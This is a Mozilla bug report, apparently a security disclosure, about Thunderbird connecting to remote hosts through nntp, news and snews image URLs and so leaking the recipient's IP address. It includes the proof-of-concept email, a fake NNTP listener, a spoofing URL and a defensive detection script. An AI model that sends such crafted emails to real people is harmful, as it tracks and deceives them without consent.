Closed
Bug 1212138
Opened 9 years ago
Closed 9 years ago
Information leakage using <img src> with news or nntp URI scheme
Categories
(Thunderbird :: Security, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 968342
People
(Reporter: a, Unassigned)
Details
(Keywords: privacy, reporter-external, sec-moderate)
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150511103303
Steps to reproduce:
Opened a crafted HTML email such as the following:
From alech@alech.invalid Sun Mar 6 16:11:05 2011
To: alech@alech.invalid
From: Alexander Klink <alech@alech.invalid>
Subject: nntp url leaking
Message-ID: <56141D44.4000209@test.invalid>
Date: Tue, 6 Oct 2015 21:13:08 +0200
Content-Type: text/html
<img src="nntp://0x90.eu/foo/123">
Alternatively, news://0x90.eu works, too. (news://0x90.eu/foo/123 pops up a dialog asking whether I want to subscribe to foo).
Actual results:
Thunderbird creates an NNTP connection to 0x90.eu, thus leaking the user's IP address (which is prevented when using HTTP).
On 0x90.eu, I created a fake NNTP server using
# cat nntp.sh
#!/bin/sh
/bin/echo -e "500 wombatvax news server ready - posting ok\r"
read line
# socat -v -D TCP-LISTEN:nntp,fork,reuseaddr,ip-pktinfo EXEC:./nntp.sh
In the socat output, it can be seen that Thunderbird connects to the server and then sends a QUIT command:
< 2015/10/07 00:53:36.859143 length=46 from=0 to=45
500 wombatvax news server ready - posting ok\r
> 2015/10/07 00:53:36.989454 length=6 from=0 to=5
QUIT\r
Expected results:
Thunderbird should not have created a TCP connection without the user's consent (similar to the "remote image loading" dialog, when HTTP is used for the same purpose).
Comment 1•9 years ago (Reporter)
In addition, for every such host, a new news server is automatically created in the GUI, which would allow attackers to put information in the GUI until the user realizes how to delete news servers ...
Comment 2•9 years ago (Reporter)
I just verified it also on the nightly (44.0a1, 2015-10-06).
Comment 3•9 years ago (Reporter)
The snews: URI scheme is also affected.
Updated•9 years ago
Flags: sec-bounty?
Comment 4•9 years ago (Reporter)
For some confusing UI choices, try
nntp://n:119/our%20premium%20Thunderbird%20support%20program%3F%20%28only%20%249.99%2Fmonth%29
:-)
Comment 5•9 years ago
Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block these? Can you confirm this?
Flags: needinfo?(vseerror)
Keywords: privacy, sec-moderate
Comment 6•9 years ago
(In reply to Daniel Veditz [:dveditz] from comment #5)
> Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> these? Can you confirm this?
Joshua or Kent probably know
Flags: needinfo?(vseerror) → needinfo?(rkent)
Comment 7•9 years ago (Reporter)
I didn't verify exactly where in the code this is not blocked, but nsMsgContentPolicy has a list of "exposed protocols", quote:
* Determines if the content location is a scheme that we're willing to expose
* for unlimited loading of content.
cf.
http://hg.mozilla.org/comm-central/file/fb83f130e2d5/mailnews/base/src/nsMsgContentPolicy.cpp#l384
and around.
The list is the following: mailto, news, snews, nntp, imap, addbook, pop, mailbox, about. I couldn't manage to get any connections using imap or pop, I assume the other ones are unable to make remote connections, anyways.
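The following scanner is an added example and is not part of this bug's test case or of Thunderbird's nsMsgContentPolicy. It shows how a mail gateway or triage script could flag the pattern reported here before a message reaches a client: HTML parts whose automatically fetched attributes (img src, link href, video poster and similar, not plain anchors that require a click) point at the news, snews or nntp schemes that the report shows open a connection without the remote-content prompt. The message embedded in it is constructed, as are the tracker.example.invalid hosts; the leak check decodes the path so that a decoy like the one in comment 4 is visible in the finding.

```python
"""Flag newsgroup-scheme URLs in auto-loading HTML attributes of a mail message.

Added example (not Thunderbird code). The sample message and hosts below are
constructed for demonstration.
"""
import sys
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Schemes from the exposed-protocol list in the bug report that were shown to
# open a TCP connection when used as an image source.
LEAKY_SCHEMES = {"news", "snews", "nntp"}

# (tag, attribute) pairs that a renderer fetches without a click. Plain <a href>
# is deliberately absent: following it is a user action, not a passive leak.
AUTO_LOAD_ATTRS = {
    ("img", "src"), ("input", "src"), ("source", "src"), ("video", "src"),
    ("video", "poster"), ("audio", "src"), ("iframe", "src"), ("frame", "src"),
    ("embed", "src"), ("object", "data"), ("link", "href"), ("script", "src"),
    ("body", "background"), ("table", "background"), ("td", "background"),
}


class _AutoLoadCollector(HTMLParser):
    """Collect auto-loaded references whose scheme is in LEAKY_SCHEMES."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        for name, value in attrs:
            if value is None or (tag, name) not in AUTO_LOAD_ATTRS:
                continue
            parts = urlsplit(value.strip())
            scheme = parts.scheme.lower()
            if scheme not in LEAKY_SCHEMES:
                continue
            try:
                port = parts.port          # ValueError on a non-numeric port
            except ValueError:
                port = None
            self.findings.append({
                "tag": tag, "attr": name, "scheme": scheme,
                "host": parts.hostname, "port": port,
                "path": unquote(parts.path),   # decoded, so decoys are readable
            })


def scan_message(raw: bytes) -> list:
    """Return one finding per leaky auto-loaded reference in any text/html part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _AutoLoadCollector()
        collector.feed(part.get_content())
        collector.close()
        findings.extend(collector.findings)
    return findings


def endpoints(findings) -> set:
    """Distinct (scheme, host, port) triples a client would connect to."""
    return {(f["scheme"], f["host"], f["port"]) for f in findings}


# Constructed sample: one benign https image, three leaky auto-loads, one
# comment-4 style decoy, and a click-only news link that must not be flagged.
SAMPLE_EML = b"""\
From: Sender <sender@example.invalid>
To: victim@example.invalid
Subject: constructed test message
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>
<img src="https://example.invalid/logo.png">
<img src="nntp://tracker.example.invalid/foo/123">
<IMG SRC=" NEWS://tracker.example.invalid ">
<link rel="stylesheet" href="snews://tracker.example.invalid:563/x">
<img src="nntp://n:119/our%20premium%20support%3F">
<a href="news://news.example.invalid/some.group">click me</a>
</body></html>
"""

if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_EML
    for f in scan_message(raw):
        print(f"{f['tag']}[{f['attr']}] -> {f['scheme']}://{f['host']}:{f['port']} {f['path']!r}")
```

Run it with a path to an .eml file, or with no arguments to scan the embedded sample. It does not look inside CSS (`style` attributes or `<style>` blocks with `url()`) or `srcset` lists, so a gateway that relies on it should pair it with the usual remote-content stripping.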
Comment 8•9 years ago
(In reply to Daniel Veditz [:dveditz] from comment #5)
> Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> these? Can you confirm this?
In some sense, they're necessary, since we rewrite cid: links in files to the message URL + some extra query parameters.
This is a dupe of at least bug 968342, and I think there's another one, but I'm not finding that one right now.
Comment 9•9 years ago
I should add that the type of a news://server/group check should be something like application/x-message-newsgroup, which should prevent it from being usable as a subdocument resource.
Although bug 108203 would probably preempt any sort of leak here, to the extent that anything can be prevented (note that URLs like <news://news.mozilla.org/mozilla.dev.apps.thunderbird> or the article format are perfectly valid URLs that we'd want to handle if someone clicks on them in a webpage).
Comment 10•9 years ago (Reporter)
I don't really see how bug 108203 would prevent anything there, can you elaborate please? Also, this is not about clicking on it (which I'd consider a perfectly valid non-information-leaky use case), but use in an image source. Has anyone tried my original test case?
Comment 11•9 years ago
Sorry that should be bug 108293. (The irony is that the typo still refers to an NNTP bug).
Fundamentally, the code paths that go through an image source versus clicking on something are remarkably similar--you're requesting a URL load in the backend either way.
Comment 12•9 years ago (Reporter)
Ah, OK, 10829 makes more sense :-).
Well, for privacy reasons, I still believe this load should not happen in the first place. I assume most Thunderbird users have no idea what NNTP and newsgroups actually are ... Also, as mentioned in comment 4, the UI doesn't even mention newsgroups in some cases, making it potentially even more confusing for users.
Comment 14•9 years ago (Reporter)
It's been ten days without contact. Any info on how you plan to resolve this?
Comment 15•9 years ago (Reporter)
It's been nearly two months since the original report, any plans on resolving this bug?
Comment 16•9 years ago
(In reply to Joshua Cranmer [:jcranmer] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #5)
> > Wayne: doesn't the Thunderbird nsIContentPolicy for the message pane block
> > these? Can you confirm this?
>
> In some sense, they're necessary, since we rewrite cid: links in files to
> the message URL + some extra query parameters.
>
> This is a dupe of at least bug 968342, and I think there's another one, but
> I'm not finding that one right now.
Are you thinking of bug 968334 ?
Reasonable to dup to bug 968342?
Flags: needinfo?(Pidgeot18)
Updated•9 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Comment 18•9 years ago
(In reply to Wayne Mery (:wsmwk, use Needinfo for questions) from comment #16)
> Reasonable to dup to bug 968342?
Yep, although it's already been done. :-)
Flags: needinfo?(Pidgeot18)
Updated•9 years ago
Flags: sec-bounty? → sec-bounty+
Updated•6 years ago
Group: mail-core-security
Updated•6 months ago
Keywords: reporter-external